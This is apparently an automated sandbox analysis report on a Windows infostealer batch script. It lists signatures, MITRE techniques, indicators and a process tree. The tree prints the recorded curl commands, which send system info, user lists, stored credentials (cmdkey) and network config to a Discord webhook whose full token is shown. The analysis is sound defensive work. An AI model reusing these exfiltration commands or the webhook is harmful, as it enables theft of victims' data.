0f44f6cf90b1f970e597d52a33601aa052f473ebaea67436cc181bc46e8d9650

Resubmissions

10/07/2024, 17:28

240710-v2b86szfpr 8

10/07/2024, 17:25

240710-vzrabazfkm 7

Analysis

max time kernel
569s
max time network
571s
platform
windows10-2004_x64
resource
win10v2004-20240709-en
resource tags

arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
submitted
10/07/2024, 17:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

text.txt
Size

183B
MD5

7d22a7c501b54f3f4c889a4c6a56c6c1
SHA1

0320dce6fda62bcd576013fd0b787bb715ba64bf
SHA256

0f44f6cf90b1f970e597d52a33601aa052f473ebaea67436cc181bc46e8d9650
SHA512

36680a3cfdeee00d5b9ba968542e2aec43efcf4bc7c8aeb3783b4282f8bc435a830d3ec4ed9f5a545cddcf4bee2503e1920935450dbcefedd006d675e700f56a

Score

8^/10

defense_evasion privilege_escalation spyware stealer

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
104	5664	powershell.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 36 IoCs

Web Service

T1102

flow	ioc
114	discord.com
115	discord.com
130	discord.com
117	discord.com
118	discord.com
126	discord.com
135	discord.com
66	camo.githubusercontent.com
124	discord.com
125	discord.com
127	discord.com
129	discord.com
132	discord.com
139	discord.com
85	raw.githubusercontent.com
113	discord.com
119	discord.com
123	discord.com
84	raw.githubusercontent.com
116	discord.com
131	discord.com
140	discord.com
111	discord.com
120	discord.com
122	discord.com
136	discord.com
138	discord.com
106	discord.com
112	discord.com
121	discord.com
128	discord.com
133	discord.com
134	discord.com
105	discord.com
137	discord.com
141	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
103	api.ipify.org

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	\??\c:\windows\system32\driverstore\filerepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF	chrome.exe
File created	C:\Windows\System32\DriverStore\FileRepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF	chrome.exe

Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs

defense_evasion privilege_escalation

Create Process with Token

T1134.002

pid	Process
3456	powershell.exe

Delays execution with timeout.exe 9 IoCs

evasion

pid	Process
5384	timeout.exe
5416	timeout.exe
5476	timeout.exe
5944	timeout.exe
1628	timeout.exe
5128	timeout.exe
6012	timeout.exe
5284	timeout.exe
5484	timeout.exe

Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery

T1057

pid	Process
5840	tasklist.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
2236	ipconfig.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
5536	systeminfo.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133651061502685623"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe

Modifies registry class 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings	BSBuilder.exe
Key created	\REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000_Classes\Local Settings	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
5100	reg.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
1252	NOTEPAD.EXE

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2596	PING.EXE

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
1544	chrome.exe
1544	chrome.exe
5932	chrome.exe
5932	chrome.exe
5932	chrome.exe
5932	chrome.exe
3456	powershell.exe
3456	powershell.exe
3456	powershell.exe
5664	powershell.exe
5664	powershell.exe
5664	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs

pid	Process
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	1544	chrome.exe
Token: SeCreatePagefilePrivilege	1544	chrome.exe
Token: SeShutdownPrivilege	1544	chrome.exe
Token: SeCreatePagefilePrivilege	1544	chrome.exe
Token: SeShutdownPrivilege	1544	chrome.exe
Token: SeCreatePagefilePrivilege	1544	chrome.exe
Token: SeShutdownPrivilege	1544	chrome.exe
Token: SeCreatePagefilePrivilege	1544	chrome.exe
Token: SeShutdownPrivilege	1544	chrome.exe
Token: SeCreatePagefilePrivilege	1544	chrome.exe
Token: SeShutdownPrivilege	1544	chrome.exe
Token: SeCreatePagefilePrivilege	1544	chrome.exe
Token: SeShutdownPrivilege	1544	chrome.exe
Token: SeCreatePagefilePrivilege	1544	chrome.exe
Token: SeShutdownPrivilege	1544	chrome.exe
Token: SeCreatePagefilePrivilege	1544	chrome.exe
Token: SeShutdownPrivilege	1544	chrome.exe
Token: SeCreatePagefilePrivilege	1544	chrome.exe
Token: SeShutdownPrivilege	1544	chrome.exe
Token: SeCreatePagefilePrivilege	1544	chrome.exe
Token: SeShutdownPrivilege	1544	chrome.exe
Token: SeCreatePagefilePrivilege	1544	chrome.exe
Token: SeShutdownPrivilege	1544	chrome.exe
Token: SeCreatePagefilePrivilege	1544	chrome.exe
Token: SeShutdownPrivilege	1544	chrome.exe
Token: SeCreatePagefilePrivilege	1544	chrome.exe
Token: SeShutdownPrivilege	1544	chrome.exe
Token: SeCreatePagefilePrivilege	1544	chrome.exe
Token: SeShutdownPrivilege	1544	chrome.exe
Token: SeCreatePagefilePrivilege	1544	chrome.exe
Token: SeShutdownPrivilege	1544	chrome.exe
Token: SeCreatePagefilePrivilege	1544	chrome.exe
Token: SeShutdownPrivilege	1544	chrome.exe
Token: SeCreatePagefilePrivilege	1544	chrome.exe
Token: SeShutdownPrivilege	1544	chrome.exe
Token: SeCreatePagefilePrivilege	1544	chrome.exe
Token: SeShutdownPrivilege	1544	chrome.exe
Token: SeCreatePagefilePrivilege	1544	chrome.exe
Token: SeShutdownPrivilege	1544	chrome.exe
Token: SeCreatePagefilePrivilege	1544	chrome.exe
Token: SeShutdownPrivilege	1544	chrome.exe
Token: SeCreatePagefilePrivilege	1544	chrome.exe
Token: SeShutdownPrivilege	1544	chrome.exe
Token: SeCreatePagefilePrivilege	1544	chrome.exe
Token: SeShutdownPrivilege	1544	chrome.exe
Token: SeCreatePagefilePrivilege	1544	chrome.exe
Token: SeShutdownPrivilege	1544	chrome.exe
Token: SeCreatePagefilePrivilege	1544	chrome.exe
Token: SeShutdownPrivilege	1544	chrome.exe
Token: SeCreatePagefilePrivilege	1544	chrome.exe
Token: SeShutdownPrivilege	1544	chrome.exe
Token: SeCreatePagefilePrivilege	1544	chrome.exe
Token: SeShutdownPrivilege	1544	chrome.exe
Token: SeCreatePagefilePrivilege	1544	chrome.exe
Token: SeShutdownPrivilege	1544	chrome.exe
Token: SeCreatePagefilePrivilege	1544	chrome.exe
Token: SeShutdownPrivilege	1544	chrome.exe
Token: SeCreatePagefilePrivilege	1544	chrome.exe
Token: SeShutdownPrivilege	1544	chrome.exe
Token: SeCreatePagefilePrivilege	1544	chrome.exe
Token: SeShutdownPrivilege	1544	chrome.exe
Token: SeCreatePagefilePrivilege	1544	chrome.exe
Token: SeShutdownPrivilege	1544	chrome.exe
Token: SeCreatePagefilePrivilege	1544	chrome.exe

Suspicious use of FindShellTrayWindow 62 IoCs

pid	Process
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe

Suspicious use of SendNotifyMessage 52 IoCs

pid	Process
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe
1544	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1544 wrote to memory of 3472	1544	chrome.exe	88
PID 1544 wrote to memory of 3472	1544	chrome.exe	88
PID 1544 wrote to memory of 3460	1544	chrome.exe	89
PID 1544 wrote to memory of 3460	1544	chrome.exe	89
PID 1544 wrote to memory of 3460	1544	chrome.exe	89
PID 1544 wrote to memory of 3460	1544	chrome.exe	89
PID 1544 wrote to memory of 3460	1544	chrome.exe	89
PID 1544 wrote to memory of 3460	1544	chrome.exe	89
PID 1544 wrote to memory of 3460	1544	chrome.exe	89
PID 1544 wrote to memory of 3460	1544	chrome.exe	89
PID 1544 wrote to memory of 3460	1544	chrome.exe	89
PID 1544 wrote to memory of 3460	1544	chrome.exe	89
PID 1544 wrote to memory of 3460	1544	chrome.exe	89
PID 1544 wrote to memory of 3460	1544	chrome.exe	89
PID 1544 wrote to memory of 3460	1544	chrome.exe	89
PID 1544 wrote to memory of 3460	1544	chrome.exe	89
PID 1544 wrote to memory of 3460	1544	chrome.exe	89
PID 1544 wrote to memory of 3460	1544	chrome.exe	89
PID 1544 wrote to memory of 3460	1544	chrome.exe	89
PID 1544 wrote to memory of 3460	1544	chrome.exe	89
PID 1544 wrote to memory of 3460	1544	chrome.exe	89
PID 1544 wrote to memory of 3460	1544	chrome.exe	89
PID 1544 wrote to memory of 3460	1544	chrome.exe	89
PID 1544 wrote to memory of 3460	1544	chrome.exe	89
PID 1544 wrote to memory of 3460	1544	chrome.exe	89
PID 1544 wrote to memory of 3460	1544	chrome.exe	89
PID 1544 wrote to memory of 3460	1544	chrome.exe	89
PID 1544 wrote to memory of 3460	1544	chrome.exe	89
PID 1544 wrote to memory of 3460	1544	chrome.exe	89
PID 1544 wrote to memory of 3460	1544	chrome.exe	89
PID 1544 wrote to memory of 3460	1544	chrome.exe	89
PID 1544 wrote to memory of 3460	1544	chrome.exe	89
PID 1544 wrote to memory of 3992	1544	chrome.exe	90
PID 1544 wrote to memory of 3992	1544	chrome.exe	90
PID 1544 wrote to memory of 4388	1544	chrome.exe	91
PID 1544 wrote to memory of 4388	1544	chrome.exe	91
PID 1544 wrote to memory of 4388	1544	chrome.exe	91
PID 1544 wrote to memory of 4388	1544	chrome.exe	91
PID 1544 wrote to memory of 4388	1544	chrome.exe	91
PID 1544 wrote to memory of 4388	1544	chrome.exe	91
PID 1544 wrote to memory of 4388	1544	chrome.exe	91
PID 1544 wrote to memory of 4388	1544	chrome.exe	91
PID 1544 wrote to memory of 4388	1544	chrome.exe	91
PID 1544 wrote to memory of 4388	1544	chrome.exe	91
PID 1544 wrote to memory of 4388	1544	chrome.exe	91
PID 1544 wrote to memory of 4388	1544	chrome.exe	91
PID 1544 wrote to memory of 4388	1544	chrome.exe	91
PID 1544 wrote to memory of 4388	1544	chrome.exe	91
PID 1544 wrote to memory of 4388	1544	chrome.exe	91
PID 1544 wrote to memory of 4388	1544	chrome.exe	91
PID 1544 wrote to memory of 4388	1544	chrome.exe	91
PID 1544 wrote to memory of 4388	1544	chrome.exe	91
PID 1544 wrote to memory of 4388	1544	chrome.exe	91
PID 1544 wrote to memory of 4388	1544	chrome.exe	91
PID 1544 wrote to memory of 4388	1544	chrome.exe	91
PID 1544 wrote to memory of 4388	1544	chrome.exe	91
PID 1544 wrote to memory of 4388	1544	chrome.exe	91
PID 1544 wrote to memory of 4388	1544	chrome.exe	91
PID 1544 wrote to memory of 4388	1544	chrome.exe	91
PID 1544 wrote to memory of 4388	1544	chrome.exe	91
PID 1544 wrote to memory of 4388	1544	chrome.exe	91
PID 1544 wrote to memory of 4388	1544	chrome.exe	91
PID 1544 wrote to memory of 4388	1544	chrome.exe	91
PID 1544 wrote to memory of 4388	1544	chrome.exe	91

C:\Windows\system32\NOTEPAD.EXE
C:\Windows\system32\NOTEPAD.EXE C:\Users\Admin\AppData\Local\Temp\text.txt
1⤵
- Opens file in notepad (likely ransom note)
PID:1252

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1544
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.106 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffb08cccc40,0x7ffb08cccc4c,0x7ffb08cccc58
  2⤵
  PID:3472
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1812,i,6124180335712472572,6722058610307499953,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=1796 /prefetch:2
  2⤵
  PID:3460
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1992,i,6124180335712472572,6722058610307499953,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=2100 /prefetch:3
  2⤵
  PID:3992
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2280,i,6124180335712472572,6722058610307499953,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=2296 /prefetch:8
  2⤵
  PID:4388
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3164,i,6124180335712472572,6722058610307499953,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=3176 /prefetch:1
  2⤵
  PID:244
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3284,i,6124180335712472572,6722058610307499953,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=3260 /prefetch:1
  2⤵
  PID:1276
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3160,i,6124180335712472572,6722058610307499953,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=4520 /prefetch:1
  2⤵
  PID:1740
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4692,i,6124180335712472572,6722058610307499953,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=4696 /prefetch:1
  2⤵
  PID:3644
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3740,i,6124180335712472572,6722058610307499953,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=4848 /prefetch:8
  2⤵
  PID:1768
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4868,i,6124180335712472572,6722058610307499953,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=4896 /prefetch:8
  2⤵
  PID:2204
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4872,i,6124180335712472572,6722058610307499953,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=5004 /prefetch:8
  2⤵
  PID:2276
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=4056,i,6124180335712472572,6722058610307499953,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=3352 /prefetch:8
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  PID:5932
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=3052,i,6124180335712472572,6722058610307499953,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=4412 /prefetch:1
  2⤵
  PID:3412
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5420,i,6124180335712472572,6722058610307499953,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=5480 /prefetch:1
  2⤵
  PID:4868
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5712,i,6124180335712472572,6722058610307499953,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=5696 /prefetch:1
  2⤵
  PID:5064
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=4736,i,6124180335712472572,6722058610307499953,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=4752 /prefetch:1
  2⤵
  PID:4320
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5768,i,6124180335712472572,6722058610307499953,262144 --variations-seed-version=20240708-180128.343000 --mojo-platform-channel-handle=5776 /prefetch:8
  2⤵
  PID:3768

C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe"
1⤵
PID:956

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:2564

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4876

C:\Users\Admin\Downloads\BSBuilder\BSBuilder.exe
"C:\Users\Admin\Downloads\BSBuilder\BSBuilder.exe"
1⤵
- Modifies registry class
PID:3452

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DisplayEnhancementService
1⤵
PID:3956

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\BSBuilder\output.bat" "
1⤵
PID:4560
- C:\Windows\system32\certutil.exe
  CERTUTIL -f -decode "C:\Users\Admin\Downloads\BSBuilder\output.bat" "C:\Users\Admin\AppData\Local\Temp\0.bat"
  2⤵
  PID:4868
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell start -verb runas '"C:\Users\Admin\AppData\Local\Temp\0.bat"' am_admin
  2⤵
  - Access Token Manipulation: Create Process with Token
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  PID:3456
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\0.bat" am_admin
    3⤵
    PID:2224
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c 2>NUL ping -4 -n 1 VOCYMMGW | findstr [
      4⤵
      PID:4816
    - - C:\Windows\system32\PING.EXE
        
        ping -4 -n 1 VOCYMMGW
        5⤵
        Runs ping.exe
        
        PID:2596
    - - C:\Windows\system32\findstr.exe
        
        findstr [
        5⤵
        
        PID:2896
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell Invoke-RestMethod api.ipify.org
      4⤵
      PID:5628
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Invoke-RestMethod api.ipify.org
        5⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        
        PID:5664
  - - C:\Windows\system32\curl.exe
      curl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```[Report from Admin - 194.110.13.70]\nLocal time: 17:32```\"}" https://discord.com/api/webhooks/1260647649389056103/pQJGqBgFM-UDqANGpZwBgpYgpeCbJgUsDw8FcH9RrUXbDym66WI9HLn91RsP5Kd03Zgh
      4⤵
      PID:5708
  - - C:\Windows\system32\systeminfo.exe
      SystemInfo
      4⤵
      Gathers system information
      PID:5536
  - - C:\Windows\system32\curl.exe
      curl --silent --output /dev/null -F systeminfo=@"C:\Users\Admin\AppData\Roaming\sysinfo.txt" https://discord.com/api/webhooks/1260647649389056103/pQJGqBgFM-UDqANGpZwBgpYgpeCbJgUsDw8FcH9RrUXbDym66WI9HLn91RsP5Kd03Zgh
      4⤵
      PID:2284
  - - C:\Windows\system32\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:5840
  - - C:\Windows\system32\curl.exe
      curl --silent --output /dev/null -F tasks=@"C:\Users\Admin\AppData\Roaming\tasklist.txt" https://discord.com/api/webhooks/1260647649389056103/pQJGqBgFM-UDqANGpZwBgpYgpeCbJgUsDw8FcH9RrUXbDym66WI9HLn91RsP5Kd03Zgh
      4⤵
      PID:5868
  - - C:\Windows\system32\net.exe
      net user
      4⤵
      PID:1532
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user
        5⤵
        
        PID:2232
  - - C:\Windows\system32\curl.exe
      curl --silent --output /dev/null -F tasks=@"C:\Users\Admin\AppData\Roaming\netuser.txt" https://discord.com/api/webhooks/1260647649389056103/pQJGqBgFM-UDqANGpZwBgpYgpeCbJgUsDw8FcH9RrUXbDym66WI9HLn91RsP5Kd03Zgh
      4⤵
      PID:2780
  - - C:\Windows\system32\quser.exe
      quser
      4⤵
      PID:4804
  - - C:\Windows\system32\curl.exe
      curl --silent --output /dev/null -F tasks=@"C:\Users\Admin\AppData\Roaming\quser.txt" https://discord.com/api/webhooks/1260647649389056103/pQJGqBgFM-UDqANGpZwBgpYgpeCbJgUsDw8FcH9RrUXbDym66WI9HLn91RsP5Kd03Zgh
      4⤵
      PID:4876
  - - C:\Windows\system32\reg.exe
      reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
      4⤵
      Modifies registry key
      PID:5100
  - - C:\Windows\system32\curl.exe
      curl --silent --output /dev/null -F tasks=@"C:\Users\Admin\AppData\Roaming\stup.txt" https://discord.com/api/webhooks/1260647649389056103/pQJGqBgFM-UDqANGpZwBgpYgpeCbJgUsDw8FcH9RrUXbDym66WI9HLn91RsP5Kd03Zgh
      4⤵
      PID:1448
  - - C:\Windows\system32\cmdkey.exe
      cmdkey /list
      4⤵
      PID:4284
  - - C:\Windows\system32\curl.exe
      curl --silent --output /dev/null -F tasks=@"C:\Users\Admin\AppData\Roaming\cmdkey.txt" https://discord.com/api/webhooks/1260647649389056103/pQJGqBgFM-UDqANGpZwBgpYgpeCbJgUsDw8FcH9RrUXbDym66WI9HLn91RsP5Kd03Zgh
      4⤵
      PID:4788
  - - C:\Windows\system32\ipconfig.exe
      ipconfig /all
      4⤵
      Gathers network information
      PID:2236
  - - C:\Windows\system32\curl.exe
      curl --silent --output /dev/null -F tasks=@"C:\Users\Admin\AppData\Roaming\ipconfig.txt" https://discord.com/api/webhooks/1260647649389056103/pQJGqBgFM-UDqANGpZwBgpYgpeCbJgUsDw8FcH9RrUXbDym66WI9HLn91RsP5Kd03Zgh
      4⤵
      PID:4736
  - - C:\Windows\system32\curl.exe
      curl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```- CHROME -```\"}" https://discord.com/api/webhooks/1260647649389056103/pQJGqBgFM-UDqANGpZwBgpYgpeCbJgUsDw8FcH9RrUXbDym66WI9HLn91RsP5Kd03Zgh
      4⤵
      PID:1560
  - - C:\Windows\system32\curl.exe
